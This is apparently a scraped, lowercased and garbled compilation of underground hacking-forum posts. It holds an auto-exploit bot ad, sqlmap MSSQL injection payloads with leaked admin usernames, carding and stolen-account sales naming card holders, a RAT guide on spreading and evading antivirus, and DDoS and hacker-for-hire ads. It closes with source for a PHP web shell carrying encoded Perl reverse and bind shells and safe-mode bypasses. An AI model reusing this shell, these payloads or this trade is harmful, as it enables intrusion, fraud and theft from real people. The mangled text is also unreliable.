this bot offers grabbing websites from with specified bing pages and exploits the following automatically prestashop module remote file upload. 
prestashop module remote file upload. 
prestashop vtemslidshow module remote file upload. 
prestashop columnadverts module remote file upload. 
joomla remote code execution cve. 
joomla com guru sql injection. 
joomla com media sql injection. 
joomla com enmasse sql injection. 
joomla com payplans sql injection. 
joomla com easy youtube gallery sql injection. 
joomla com memorix sql injection. 
joomla com informations sql injection. 
other scripts are sold seperatly. 
look your message box just send the login have fun. 
this awesome gonna try this. 
going check this out going check this out going check this out. 
let see how work. 
does any one have this program. 
been looking for something just like this. 
let take look hope works. 
thanks for the post hope its work out. 
hello found all the codes from this expl local expl this the remote exec with activex bypass just test from your host right away and wont activex warn. 
will try this thanks for shere. 
need try this out. 
canada blacklist yes checked. 
thanks let try this. 
thanks bro you are the best. 
i'm willing pay some one for finding method and helping learn has simple possible creating tool than can for bypass steam guard phone and coputer easly trading invetories form them. 
sorry for english its not the best. 
baden wurttemberg germany blacklist checked. 
nice post but link broken please updade looking for bank phishing partner. 
really hope this works. 
tommar wrote dogpen wrote have searched high and low for real free vpn service stay anonymous online. 
have this just you still need. 
hello pro see last post. 
very good bonet let try. 
also very good tutorial love you guys point out though with the option sqlmap have the ability this file read etc named. 
conf etc file read var index. 
php which may dump source code and allow hit root hacked thai gov this way getting there pass for than dropping myself shell via into outfile root through direct mysql connection. 
omg thabnk sayuhn nhffcn jhh. 
xbeastin wrote gonna try her out. 
ill check out and reply back. 
presuming this was the site was talking about. 
com and from look around could not even find any poc for sqli most are based html but did confirm allowed javascript cookies best possible method search for would xss. 
and mate with the request maybe you should have helped including complete direct link. 
when use internet through college's network blocks some the websites like facebook and which can accessed use proxy application like psiphon. 
but even using proxies camera doesn't work with certain websites like omegle and and not connecting just behaves insanely. 
also applications such yahoo messenger and bluestacks fail connect. 
taegu jikhalsi unknow korea republic blacklist checked. 
got the old opne. 
database survey table sur user entries username user password email address admin me'kosurvey servicedesk set. 
anuwat yencold anuwat set. 
com ymi siriwan bfitsec. 
com uabm piyachatsa asl. 
aspx mai type error based title microsoft sql server sybase and error based where having clause payload mai' and convert int select char char char har char select case when then char else char char char char char char and 'svcf' 'svcf type union query title generic union query null columns payload mai' union all select null null null null null null char char char char char char char char char char char char char char char char char char char null null null type stacked queries title microsoft sql server sybase stacked queries payload mai' waitfor delay type and time based blind title microsoft sql server sybase time based blind payload mai' waitfor delay. 
hope fully not has malware. 
sounds interesting will try out. 
the site down man. 
hello community i'm offering your netflix amazon prime and nepster same spotify account. 
fast delievery good support and account warranty are some the main things want base business trust high factor this business will provide month netflix accounts days nepster accounts for just small feedback. 
furthermore there will for the time being only the possiblity buy month account netflix amazon prime day account nepster for all this different streaming websites. 
avoid trouble and sure that you get your own account can share with friends famaly pricelist premium netflix account month screen screens screens premium nepster account days amazon prime instant video month game thrones all seasons available varys just write for informations just starting this business the only month account there ensure get what you pay for chances can made soon there enough demand for contact this board email getyouraccount web. 
skype lolococempire bitmessage mfgemrchdsou ipvz payment options bitcoin paypal any suggestions are welcome lets say you take the screens netflix account for one month and you've got someone split the money with. 
theoretically for both you you buy this account normally. 
your partner gives you the and you even make profit out and youve got your netflix account i'm sorry for possible grammatical mistakes else. 
improvements are also welcome here. 
how can get this friend. 
anyone does this link work. 
thanks works perfectly gonna share with friends very nice. 
full access this server whatever you want. 
unknow unknow reverse dns. 
dont advt bro dash. 
email password code hotmail xjavvoohx hotmail. 
louisiana united states blacklist checked. 
hey does this work internet wrote facebyte facebook account scraper. 
how works scraping info through facebook games and quizes. 
also has other features have been working. 
facebyte was coded and the scraper pulls the info through games like farmville etc. 
features scraper get tons facebook accounts login info matter days. 
leave the program running and when you click stop. 
txt all the scraped usernames and passwords will exported your desktop. 
you can use these accounts selling facebook likes and follows big pages this huge market facebook you can sell your services for page new added target mode hack individual facebook accounts script hidden facebook chat message sent from one pre made accounts not yours. 
matter they open are even online mins the password will delivered you. 
lockveiw converts the given private facebook account url viewable one. 
makes creeping easy and you can even see people who blocked you see their posts pics vids and more beta networker want see the person has instagram attached their facebook use this also searches other social networks for their name and email. 
still working this might not return any results for everyone. 
worked half the ones tried. 
request message bomb blow someones message inbox with messages seconds send millions pms. 
friend request bomber too requests hour link not working expired does anyone know any other link. 
hello gentlemen and ladies. 
give you second server have your fun with. 
multiple websites this server. 
let's see anyone can actually bring down the server. 
root jzn tax kghhv leave your comments what you did and you'd like teach all how you did. 
thx will useful works correctly. 
thank you for the tool mate this will will added hack pack. 
rar password vipunderground download url wow. 
thank you very much worked and didnt know anuthing awsome. 
can you please figure out the new password. 
pysender small tool coded python allow you send emails via smtp. 
github hidden content you must reply see links. 
wana try this dark net links. 
will try this hope will learn from. 
will try this later. 
distrito especial unknow dynamic. 
united states blacklist yes checked. 
bucuresti romania blacklist checked. 
edu united states blacklist checked. 
com ukraine blacklist yes checked. 
emilia romagna italy blacklist yes checked. 
gujarat unknow india blacklist yes checked. 
com france blacklist yes checked. 
spain blacklist yes checked. 
org united states blacklist yes checked. 
primor 'ye russian federation blacklist yes checked. 
west virginia united states blacklist yes checked. 
ile france france blacklist yes checked. 
thanks man let see. 
show that plz man. 
have look whats inside the link. 
antivirus can detect virus because the nature the program. 
hws ths work thnx for the share lets see. 
sao paulo unknow bfb cdd. 
wanna see who the best banks hacker can have business relationship with. 
need trustworthy bank hackers. 
will pay for your services. 
below banks details bank america boa wellsfargo pnc capitalone suntrust jpmorgan you have logins for anyone this banks wil pay and continue business relation with you. 
this what you can with this rat managers file manager process manager service manager device manager window manager regitry manager installed programs active port list spy screen capture webcam capture password recovery keylogger audio capture network tools socks proxy http proxy send file download and execute open webpage url redirection extras dos prompt quick search for logs chat extras open close rom etc. 
and alot more some screens now some faqs what cybergate cybergate remote administrative tool trojan for windows operating systems. 
you can use cybergate manage computers monitoring your child etc. 
where can get cybergate there website for cybergate but you can easily download from thread. 
what operating systems are supported cybergate windows windows windows windows. 
windows windows windows vista windows will cybergate slow computer. 
cybergate won't slow your computer small program and works background and has been optimized minimize resource use. 
when downloaded cybergate can't extract problem occurs. 
what should that's because your anti virus they detect unwanted applications your anti virus could prevent downloading. 
disable your anti virus and try again. 
when have downloaded cybergate antivirus detect virus. 
what should well since rats are hacktools and all the hack tools are detected viruses turkojan detected virus also. 
download and install cybergate you will need turn off your anti virus. 
why should use you don't have static you're will change each time your internet reconnects the server won't able reach you. 
prevent loosing victims because your dynamic you will need host. 
what should after install server after you install your server you should spread. 
for more help spreading click here i've created server but don't see the directory. 
why that's caused your antivirus. 
the server detected and won't let. 
suggest you remove just simply activate your antivirus you are going use rats. 
i've send server friend msn but doesn't connect. 
that's because has antivirus firewall and won't let him connect your rat. 
make fud fully undetectable you should use crypter. 
the author cybergate created his program for legitimate purposes. 
for example there are many legal activities. 
parents can use keyloggers protect their children from online abuse etc. 
some people use for stealing passwords credit cards and more but it's not software which breaks the law but the person who uses. 
can cybergate used for legitimate purposes yes. 
you can monitor your children online activity. 
make sure they don't visit pornographic websites. 
you can find out someone uses your computer while you are away ensure one accessing your personal files while you are away and more. 
how make server fud you should use binder crypter. 
thank you for that amazing tool. 
today have understood which unfortunately space room party flows baton. 
thanks lot appreciate dealing with excellent helpful tips. 
not legitimate immense enthusiast with collection gives however apparently successful. 
awesome fascinating and serious space related business man will try that will reward humankind. 
fascinating blog post might this kind provide individuals newer and more effective important information the foreseeable future. 
good sizeable space related small business owner challenge which could actually offer optimism and then concept order man humanity. 
hey there only got conscious your web blog through digg and discovered incredibly illuminating. 
will smart for ones location. 
i'll try delight when you resume this particular later. 
many would reaped benefits from simply writing. 
excellent option for people. 
already know dear bro but nice share. 
thanks for sharing friend hope stillup. 
over the internet this informative article being essentially handy even though the information and facts are not all instead brand new. 
ones fixed site visitors present suited you your calculation into your site believe that remains this can very matching your behalf. 
regardless the fact quite possibly more closely tone. 
wassup appreciate the internet site. 
you should gain the main sammy's. 
terrific hard work and even appreciate your produce organization mika recent the following working with all the best. 
wow afflicted mother you're most interesting appreciate you acquiring all you want the big apple. 
great occupation considering the switching. 
created your personal evaluations. 
you the best possible legitimate reason change position that will the big apple. 
personally don't ddos but you're looking attack home connections save your money and buy web based stresser you're looking attack sites would suggest buying servers and either coding own scripts use public ones however both would work. 
tip when looking for servers you should never use mainstream providers like ecatel they more than likely ban for ddos. 
course you could root servers however feel that's little over your skill level for now you should stick stressers. 
also wouldn't try anything with botnets there alot more complicated than they sound beginner espacially someone who refers ddosing 'relying ddos programs. 
thanks bro share it's perfectly. 
welcome all you services i'm big seller and real hacker here have worked for many people around the world believe unity. 
trust and honesty needed all field money making you can contact any time buy cvv good and fresh have some tools make money online for all customer. 
and guarantee one thing you will really happy business with prestige quality and safety business contact for serious business gmail lifetalk gmail. 
com hang out lifetalk icq sell cvv good and fresh all country i'm looking for good customer buy cvv everyday and long term will discount bonus you order bulk format cvv fullz info type card card number exp. 
date cvv first name last name dob ssn address city state zip code country email phone number mmn cvv. 
france fullz info germany fullz info italy fullz info sweden fullz info asia fullz info prices for western union online transfer asia canada france germany italy and some african countries for mtcn get mtcn sender's details for mtcn get mtcn sender's details for mtcn get mtcn sender's details for mtcn get mtcn sender's details transfer minimum with price first for the time customer western union online software western union bug bug version latest with activation code master and visa bin try your luck and some the dumps here will work good for you kusner corrine. 
pin smith larry pin mcmahon jim pin soukup christian pin satterfield reno pin sell bank login paypal account bank login username password number full info paypal account email address paypal password full info have all details for login and can transfer balance your account bank paypal you want same price for bank and paypal bank bank america chase wells fargo. 
balance balance bank lloyds tsb barclays standard chartered hsbc. 
balance gbp balance gbp dumps with cardholder info price exclusive dumps track track with cardholder info zip dob address cvv usa mastercard standart visa classic visa gold platinum corporate signature business american express discover amazon gifts certificates canada mastercard visa classic visa gold platinum corporate signature business mastercard visa classic visa gold platinum corporate signature business other countries mastercard visa classic visa gold platinum corporate signature business shipping shopping any address and shop iphones laptops perfums and more come for more deal conditions sale read before add icq contact list. 
dumps are sent you after full payment for the order. 
according desire staff can checked during the moment purchase. 
consultations and advices how where and what for it's possible take advantage the given goods. 
gifts just for test etc. 
and very tired from beggars and children. 
not need wasted and time too. 
minimum orders you pay with rreserve details for orders icq. 
payment method perfect money western union moneygram bitcoin. 
dumps minimum order for pcs contact for serious business gmail lifetalk gmail. 
com hang out lifetalk icq hope will hear form very soon. 
wrote mtcn received done western for. 
png vouch for the mayor. 
bond benz wrote free working php script check valid emails and registred with paypal. 
screenshoot download thanks been needing this. 
need your service urgently. 
foksi wrote origin account bypass security question when you get cracked origin accounts this method shows you how bypass security question. 
thanks for sharing the accounts mate mate thanks. 
thanks brother for that. 
thank you testing now. 
good info keep can try. 
thanks much for this. 
its really easy find your phones and connect would restore that phone completely changes everything and reconects with different wont have access you sent from iphone using tapatalk make sure you dont connect him anyway sent from iphone using tapatalk. 
need someones help give crack for itunes gift card please. 
good job i'll see. 
whatsapp one the most popular messenger app that also lets you share pictures videos music files and. 
now everyone have whatsapp our smartphones. 
prefer whatsapp among other messaging apps due its simplicity and instant messaging service. 
although each and everything quite handy whatsapp but what the most disturbing part that you came across for you run dual sim your android smartphones you might willing enjoy two separate whatsapp account for your two different telephone numbers your smartphone. 
isn however this where whatsapp puts limitations its users. 
whatsapp users can not use more than one whatsapp account their mobile devices. 
however you are probably wondering how find excellent solution for this problem that actually works today introducing you two different android apps ogwhatsapp and switchme that allows users run multiple whatsapp accounts single smartphone. 
method using ogwhatsapp ogwhatsapp android app that allows you use two separate whatsapp accounts your single android device without any need root your android device. 
while running your normal whatsapp account your smartphone you can follow some simple steps below order run different whatsapp account the ogwhatsapp. 
follow these simple steps step take complete backup your whatsapp data and restore. 
step delete all the whatsapp data going settings apps whatsapp clear data. 
step rename the sdcard whatsapp directory sdcard ogwhatsapp. 
you can use any file manager for android this task from windows. 
step uninstall your original whatsapp app from your android device. 
step now hidden content you must reply see links your android smartphone. 
step once installed remember verify your old number that was previously registered with the original whatsapp ogwhatsapp. 
step now install the official whatsapp for your other number from the play store. 
this crazy enjoy two separate whatsapp accounts for both telephone numbers your single android device without even rooting your android device. 
method use switchme run multiple accounts hidden content you must reply see links switchme another android app that allows you have two separate whatsapp accounts single android device but this app requires your android smartphone rooted. 
here the deal switchme multiple account app allows you log and out multiple user spaces however needs root access this. 
however users cannot access the other profile from their current profile because each account within the multiple profiles will have its settings applications and data. 
follow these simple steps step root your android device. 
step make sure that you have whatsapp app installed your smartphone. 
step hidden content you must reply see links your smartphone. 
step run switchme multiple accounts will ask for superuser request that you need grant. 
step now create user profile with your name switchme app. 
this profile will administrator account containing all the current apps and settings and will also reflect your whatsapp profile that already installed your smartphone. 
step now create another profile using different name tapping the create profile button switchme app and then choose the switch option selecting this account. 
step now your smartphone will restart automatically and once ready use install official whatsapp again from google play store and register for the different phone number. 
now you can easily use multiple whatsapp accounts your single android smartphone. 
the free version switchme multiple accounts app allows you use only two user account. 
have made available solutions for both users who want use multiple whatsapp accounts their smartphone without rooting their android device and with rooting their android device respectively. 
tcp syn indent indent ddos. 
awsome guy can tell how dash. 
nice give aways keep bro nice. 
very well explain bro nice tut. 
thank you for tut. 
cracked apk tools premium. 
tools premium apk free download tools universal application identify problems computer networks well convenient and powerful tool for tuning the network. 
using tools you can easily diagnose the problem the network this case any distance. 
the simple interface allows you quickly find your external address receive detailed information any other internet address and access the most popular program that you use your computer. 
special service connection test will inform you when you are not connected the internet. 
features detailed information about your network and device. 
features ping ping tool lan scanner dns lookup port scanner whois provide data about the site and its owner setup router directly from your smartphone tablet trace route traceroute tool log connections calculator host converter and even more how install download from bellow link copy and paste extsd install normally like other app that's all enjoy seriously hit that button that's motivating factor don't think necessary for virus scan but for who skeptical here. 
great that the best way. 
nice post thank you very much. 
this not working bro thsjs wirus. 
thanks man will check that. 
good stuff would check out. 
codefire wrote password list containing passwords and most common used password list thanks for downloads post longer allowed here the download codefire wrote list containing passwords and most common used password list thanks for downloads post longer allowed here the download. 
thank you will try out. 
replying tosee the content. 
codefire wrote cpanel nightmare priv times faster from puplic version its shows becoz its code. 
get here hide reply hide reply password hide reply hide reply. 
jackass the best the world. 
want know about this what update new link its dead. 
hidden content you must reply see links four month ago massive data breach the ebay website affected million registered users worldwide after its database was compromised. 
meanwhile another critical vulnerability the ebay website was reported allowing attacker hijack millions user accounts bulk. 
egyptian security researcher yasser. 
ali informed the hacker news about this vulnerability months ago which could used the cyber criminals the targeted attacks. 
yasser secretly demonstrated the vulnerability step step the hacker news team and confirmed works. 
since was not addressed the ebay security team kept the technical details this vulnerability hidden from our readers. 
but promised share the technical details this interesting flaw once after ebay team patch. 
here the vulnerability yasser found could allow you reset password any ebay user account and that too without any user interaction dependency. 
the only thing you required the login email username the victim you want hack. 
hidden content you must reply see links but how hack any ebay account basically recover the forgotten password user first redirected password reset page where ebay page first generates random code value html form parameter reqinput which visible the attacker well using browser inspect element tool. 
after the user provides his her email and presses the submit button ebay generates second random code which unknown anybody else except the users themselves and send the code along with password reset link the ebay user with the registered email address. 
once the user clicks the password reset link provided the email user will redirected ebay page with new password set option where the user only needs enter new password twice and has submit order reset his ebay account password. 
here the vulnerability resides yasser noticed that instead using the secret code the new password http request sends the same respective reqinput value that has been generated the first request when the user clicked reset password and which known the attacker shown hidden content you must reply see links proof concept the researcher targeted one our team members temporary account with email address info thehackernews. 
first made password reset request ebay for the targeted email and saved the generated reqinput value from the inspect element. 
then directly crafted new http request the ebay server password reset form action with the known reqinput value new password confirm password and password strength parameters. 
bang successfully able reset our ebay account password without our team member interaction within while. 
video youtube brkk wtoa. 
com watch brkk wtoa video large scale automated attack sophisticated hacker could had launched automated mass password reset request attack for all those email accounts which were leaked previously reported massive ebay data breach. 
the company has already patched the vulnerability after yasser responsibly disclosed the flaw the ebay security team. 
but this months delay delivering the patch could have compromised millions ebay users accounts targeted attack even you had changed your password after the data breach. 
screenshoot download bond benz wrote free working php script check valid emails and registred with paypal. 
wsoso password for file tacoz sure smack that good thanks you. 
springfield unknown united states checked socks. 
wayne unknown united states checked socks. 
clifton park united states checked socks. 
alexandria united states checked socks. 
west branch united states checked socks. 
venice unknown united states checked socks. 
oceanside unknown united states checked socks. 
huntingdon valley united states checked socks. 
kinderhook united states checked socks. 
grand rapids unknown united states checked socks. 
utica united states checked socks. 
molalla united states checked socks. 
team consisting highly skilled and efficient developers and hackers. 
upgrade university grades facebook instagram twitter whatsapp line skype hack delete unwanted online pictures and videos any website remove criminal records hack bank accounts apps hacking mastercard paypal bitcoin money gram with untraceable credit etc. 
have track records from our client well highest return hire rate. 
contact email huonghacker gmail. 
thanks for sharing will give try and hopefully get working. 
ares wrote don't see any link mate this thread where can download spyeye need download link mate. 
tanks for the post brother hope will work. 
takes login domain password. 
poor protection hidden content you must reply see links download here hide reply attach attach hide reply. 
thanks very sorry the file you requested not available. 
codefire wrote this post going share new critical issue that have identified instagram mobile app. 
during tests their android app have set lab pentest the app. 
then started using the app phone and monitoring the traffic the network using wireshark looking for evidence for unencrypted data that goes through the network technique make this data unencrypted was encrypted. 
soon logged into account phone wireshark has captured unencrypted data that goes through http. 
this data includes the pictures that the victims watching the victim's session cookies the victim's username and. 
was shocked after seeing the results unbelievable that facebook the company that responsible for instagram did not insure that the data secured and goes through. 
then took the session cookies and used computer and simply the victim's session has been hijacked. 
have reported this issue facebook and they emailed saying the security member said facebook accepts the risk parts instagram communicating over http not over. 
this unencrypted data can lead session hijacking and stalking instagram users this may raise eye brow suspicious. 
timeline jul reported the issue. 
jul received confirmation email receiving the submission. 
jul received the first response from facebook security. 
jul asked for disclosure. 
jul received the second response from facebook security. 
recommendation until patch released which there specific date for releasing patch that has been assigned facebook not use instagram mobile app. 
instead use the normal website generally secured and encrypted. 
final thoughts unbelievable that company such facebook does not take the maximum measure insure the security their users. 
right now believe this issue might getting exploited the public surveillance and agencies. 
may have look your hack pack please. 
thank you for sharing thank you for sharing. 
thanks bro for shareing. 
thanks gonna give try. 
let see how this goes. 
cyberseason wrote tor almost undetectable all the anti viruses nice man. 
private shell bypass safe mode one server symlink forbidden root php. 
server script name basep server 'document root' strtolower substr php win slash basep str replace basep else slash basep str replace basep get 'do' remove unlink getcwd. 
server script name request 'address' readable request 'address' chdir request 'address' else alert permission denied server 'php self' formp. 
isset files filee and files filee error move uploaded file files filee tmp name files filee name alert file upload successful else alert permission denied ini get 'disable functions' disablef ini get 'disable functions' else disablef all functions enable ini get 'safe mode' safe modes else safe modes off request 'chmode' request 'chmodenum' chmod post 'chmode'. 
post 'chmodenum' alert chmod else alert permission denied picdir 'ivborw leqvr pwkfritpl tqdbsqk ofyrmsejy ifiufeuinkws mcurw wia nrpwflfr zow bojd ibq qucw xoleyjv xmetu rjudv blx oaz dlev div tlvefp lzv bryd ibl znjff eyon vuf lpqf mywx ymr osltfrpnzjpv rjj eqys plja wcu tirf ods fjgnif cjqn azj pigrqxsbn yfzp bzn czn lux ktmvfiftfnqf txy dqkpcww pwglrtb fpz jtda zvw mhlnffbsdm foz bihv cmu pxim xdk omww zlf benv wmsy mmqng ukj nfgvabz jyptjfm pbw vhcursukligay yzaia cyii picfile 'ivborw mmixfwfef yrz abhj bakdyrp iqpgkyoinnfz gnnzw nfz jyrx zmrbyijckpl xpkbee zhw ltf vnt wozktsup fpmcgs xccep dlpfa jtytpviq tldd fmcb rqs llqur zowh sdeeh hjt imuyefh fvswk psf moxhv aoi cgjmldie nlj bdd bkninbb cdbmpadonp cjlbx lgqkihfwkrax iiclz capbx zabgibecwlr ivm head. 
focus border top solid border bottom solid background padding itsecteam home. 
base decode kzwqgynkgqw pbibtag hpichqzwp ywsp. 
end function alert text echo. 
get 'do' edit get 'filename' dir readable get 'address'. 
get 'filename' opedit fopen get 'address'. 
get 'filename' while feof opedit data. 
fread opedit fclose opedit echo head. 
end exit else alert permission denied function sizee size size size round size. 
elseif size size round size. 
return size request 'do' 'about' echo head. 
itsecteam security research penetration testing teamversion. 
last update coded amin shokohi pejvak special thanks. 
rkh provider mid ahmadbady doosib home page. 
com tools itsecteam shell. 
end exit function dir file exists dir return true dir dir link dir return unlink dir foreach scandir dir item item. 
item return false return rmdir dir function download fileadd finame dlfilea fileadd. 
finame header content disposition attachment filename. 
finame header content type application download header content length. 
filesize dlfilea flush fopen dlfilea while feof echo fread flush fclose get 'do' rename echo head. 
end exit get 'byapache' 'ofms' fse fopen getcwd. 
sec engine off sec scanpost off fclose fse elseif get 'byapache' 'bysap' fse fopen getcwd. 
htaccess fwrite fse 'options followsymlinks directoryindex persian gulf for ever. 
html' fclose fse elseif get 'byapache' 'sfadf' fse fopen getcwd. 
ini fwrite fse 'safe mode off disable functions none' fclose fse get 'do' apache echo head. 
htaccess disable safe mode disable function php. 
end exit get 'do' echo head. 
end exit get 'urldd get 'timedd for get 'timedd null contents null fopen get 'urldd while feof contents. 
fread fclose get 'do' dlfile echo head. 
'download remote file address save. 
end exit function dirpe addres global slash idd dirhen opendir addres while file readdir dirhen permdir str replace addres. 
dir permdir writable permdir dirdata idd 'filename' permdir idd dirpe permdir closedir dirhen else return notperm dirdata return dirdata else return notfound function dirpmass addres massname global slash idd dirhen opendir addres while file readdir dirhen permdir str replace addres. 
dir permdir writable permdir fopen permdir. 
massname fwrite fclose dirdata idd 'filename' permdir idd dirpmass permdir closedir dirhen else return notperm dirdata return dirdata else return notfound get 'do' perm echo head. 
'find all folder writeable. 
end exit post 'affw' arrfilelist dirpe post 'affw' arrfilelist 'notfound' alert not found elseif arrfilelist 'notperm' alert permission denied else foreach arrfilelist tmpdir coi colort else colort coi permdir permdir. 
width height dir ltr. 
method post enctype multipart form data. 
'create dir dirctory name. 
'create file name file. 
end exit get 'do' mass echo head. 
end exit post 'mffw' arrfilelist dirpmass post 'mffw' post 'massname' post arrfilelist 'notfound' alert not found elseif arrfilelist 'notperm' alert permission denied else foreach arrfilelist tmpdir coi colort else colort coi permdir permdir. 
end exit post 'adlr' post 'adsr' url post 'adlr' newfname post 'adsr'. 
basename url file fopen url file newf fopen newfname newf while feof file fwrite newf fread file alert file downloaded success else alert can not open file file fclose file newf fclose newf get 'do' down and get 'type' 'file' download get 'address' get 'filename' get 'do' down and get 'type' 'dir' class zipfile var datasec array var ctrl dir array var eof ctrl dir var old offset function add dir name name str replace name. 
pack unc len this datasec new offset strlen implode this datasec cdrec cdrec. 
pack strlen name cdrec. 
pack ext ext xff xff xff xff cdrec. 
pack this old offset this old offset new offset cdrec. 
name this ctrl dir cdrec function add file data name name str replace name. 
unc len strlen data crc crc data zdata gzcompress data zdata substr substr zdata strlen zdata len strlen zdata. 
pack unc len cdrec. 
name this ctrl dir cdrec function file data implode this datasec ctrldir implode this ctrl dir return data. 
this eof ctrl dir. 
pack sizeof this ctrl dir. 
slash zipfile new zipfile function get files from folder directory put into global zipfile handle opendir directory while false file readdir handle file directory. 
file filecontents file get contents directory. 
file zipfile add file filecontents put into. 
file zipfile add dir put into. 
get files from folder directory. 
closedir handle datedl date get files from folder dlfolder header content disposition attachment filename. 
zip header content type application download header content length. 
strlen zipfile file flush echo zipfile file filename get 'dirname'. 
zip fopen filename out fwrite zipfile file fclose request 'cdirname' mkdir request 'cdirname' alert directory created else alert permission denied function bcn ipbc pbc bcperl iyevdxnyl jpbi ubmvjdejhy cxmjaglsb ngnrmw tlddskcirob gjefsr zbmf cirwb gjefsr wbca zdd gpfbvcnq iowogigv axqomsk uzwn ihrvicrob iowokchjvdca igdldhbyb rvynluyw lkcd anktsgiybzb ugy fuigno nzsb aglziglmig lzwrzigjlcnnvy lorvqsifnpq tfu rsrufn difvuywjszsb bybdb uzwn uzwn bnhg zdckpksb zgll kcjblv gvw qgisipo wzw ret vulci wzw rervjslci zwmgeycvymlul noj gjy opbc fopen bcc. 
fwrite opbc base decode bcperl fclose opbc system perl bcc. 
ipbc pbc die can not execute command for back connect disable functions safe mode function wbp wbp dxnlifnvy rvct chjvdg iew hbwuoj vsvkvslcbqrl jtkvulcbtt nlx rvktskc nlrvqsifnpx lukcrwb lcbjtkferfjfqu zksk cmxpc rlbihtrvjwrvis ifnptufyq otik cmzvcig icrwywrkcia igfjy ignsb jknmsuvo xjru uiik cnn rlbsgny klmv zscpowpjbg verjtik cmnsb nlkfnure vvck cmnsb nlkfnurevsuik opwb fopen wbp. 
fwrite opwb base decode wbp fclose opwb echo getcwd system perl wbp. 
die can not execute command for back connect disable functions safe mode function lbp lbp iyevdxnyl jpbi jhbvcnq jefsr zbmf jhbyb rvpwdldhbyb ynluyw lkcd anktsky fvcwg tvfjfqu sicrwcm byk nlrvqsifnpx kkfnfulzfuiwgc fkzhjfaw ojhbvcnqsielo qureul btlkpkttsaxn vsvkvslcbtt bwenptk zvcig icrwywrkcia igfjy ignsb nlienmsuvovcl xjru uiik jknmsuvovcipo wzw iaw gnkttjbg xvc uou ret vukttjbg oplb fopen lbp. 
fwrite oplb base decode lbp fclose oplb system perl lbp. 
die can not execute command for back connect disable functions safe mode request 'portbw' wbp request 'portbw' request 'portbl' lbp request 'portbl' request 'ipcb' request 'portbc' bcn request 'ipcb' request 'portbc' request 'do' echo head. 
usage run netcat your machin and execute this command disable firewall back connect address. 
usage run netcat your machin and execute this command disable firewall windows bind port port. 
usage run netcat your machin and execute this command disable firewall linux bind port port. 
end exit function copyf file file filename global slash fpc fopen file source while feof fpc source. 
fread fpc fclose fpc opt fopen file. 
filename fwrite opt source fclose opt request 'copyname' request 'cpyto' writable request 'cpyto' echo request 'address' copyf request 'address'. 
request 'copyname' request 'cpyto' request 'copyname' else alert permission denied request 'cfilename' echo head. 
end exit request 'nf request 'nf cs' ofile fopen request 'nf fwrite ofile request 'nf cs' fclose ofile alert file saved else alert permission denied function sqlclient global errorbox hcwd empty request 'server' empty request 'user' isset request 'pass' empty request 'query' server request 'server' type request 'type' pass request 'pass' user request 'user' query request 'query' empty request 'db' request 'db' server request 'server' type request 'type' pass request 'pass' user request 'user' isset get select getdb get select getdb query show tables res query type server user pass query elseif isset get select tbl tbl get select tbl tbl tbl query select from tbl res query type server user pass query elseif isset get drop getdb get drop getdb query drop database getdb query type server user pass query res query type server user pass 'show databases' elseif isset get drop tbl getbl get drop tbl query drop table getbl query type server user pass query res query type server user pass 'show tables' elseif isset get drop row getrow get drop row getclm get clm query delete from tbl where getclm getrow' tbl tbl query type server user pass query res query type server user pass select from tbl else res query type server user pass query res res res row array title explode res trow explode title row explode title data array field trow count trow strstr trow 'database' obj 'db' elseif substr trow 'tables' obj 'tbl' else obj 'row' foreach row data explode echo foreach trow echo echo while data echo foreach data echo obj 'row' echo echo obj 'row' echo echo echo drop echo empty request 'type' request 'type' echo connect databasedb type. 
disabled false request 'type' 'mysql' echo 'selected' echo mysql. 
disabled false request 'type' 'mssql' echo 'selected' echo mssql. 
disabled true request 'type' 'oracle' echo 'selected' echo oracle. 
disabled false request 'type' 'postgresql' echo 'selected' echo postgresql. 
disabled false request 'type' 'db echo 'selected' echo ibm server address username password submit querydb name query empty request 'query' echo request 'query' else echo 'show databases' echo hcwd function query type host user pass query res switch type case 'mysql' function exists 'mysql connect' return link mysql connect host user pass link empty mysql select link result mysql query query link result while data mysql fetch row result res. 
mysql field name result. 
mysql close link return res break case 'mssql' function exists 'mssql connect' return link mssql connect host user pass link empty mssql select link result mssql query query link while data mssql fetch row result res. 
mssql field name result. 
mssql close link return res break case 'oracle' function exists 'ocilogon' return link ocilogon user pass link stm ociparse link query ociexecute stm oci default while data ocifetchinto stm data oci assoc oci return nulls res. 
oci field name stm. 
return res break case 'postgresql' function exists 'pg connect' return link connect host host dbname user user password pass link result query link query while data fetch row result res. 
close link return res break case 'db function exists 'db connect' return link connect user pass link result exec link query while data fetch row result res. 
close link return res break return function bywsym file function exists 'symlink' echo function symlink not exist writable. 
die not writable directory level for fakedep file exists fakedir mkdir fakedir chdir fakedir while chdir. 
hardstyle explode file for. 
rmdir fakesymlink unlink fakesymlink symlink str repeat fakedir. 
fakedep fakesymlink while true symlink fakesymlink. 
num break else num unlink fakesymlink mkdir fakesymlink function bypcu file level file exists file mkdir file chdir file level hardstyle explode file for. 
curl init curl setopt curlopt url file file. 
file echo false curl exec die sorry. 
doesnt exists you dont have permissions. 
echo curl close request 'bypcu' bypcu request 'bypcu' request 'do' bypasscmd post 'bycw' echo post 'bycw' wsh new com 'w'. 
'll' exec wsh exec. 
stdout exec stdout stcom stdout readall echo head. 
post 'byws' echo stcom. 
'bypass safe mode and disable functions windows server'. 
'command bypass safe mode windows server'. 
end exit request 'do' bypassdir post 'byoc' copy compress. 
txt bopens bypass succesfull plz read file peji. 
txt this folder else bopens can not bypass this post 'byfc' curl init file. 
file debfc curl exec post 'byetc' for bye bye bye sbep sbep. 
posix getpwuid bye post 'byfc echo not sucsfull request 'bysyml' file request 'bysyml' bywsym file echo head. 
post 'byws' isset sbep for fbe fbe. 
'bypass safe mode and open basedir with bug copy zlib worked. 
'address file bypass open basedir and read file with bug curl worked php. 
'address file bypass etc passwd'. 
'bypass with ini restore'. 
'bypass with symlink worked. 
'bypass safe and open basedir with bug curl worked. 
end exit function printdrive global slash foreach range tempdrive dir tempdrive. 
return drivea post 'nameren' post 'addressren' writable request 'addressren' rename post 'addressren' post 'nameren' alert rename successful else alert permission denied get 'do' delete get 'type' dir writable request 'address' dir get 'address'. 
get 'filename' dir alert deleted successful else alert permission denied elseif get 'type' file writable get 'address'. 
get 'filename' unlink get 'address'. 
get 'filename' alert deleted successful else alert permission denied post 'fedit' post 'namefe' writable request 'address' opensave fopen post 'address'. 
post 'namefe' fwrite opensave html entity decode post 'fedit' fclose opensave alert file saved successful else alert permission denied post 'evalsource' eval post 'evalsource' get 'do' eval echo head. 
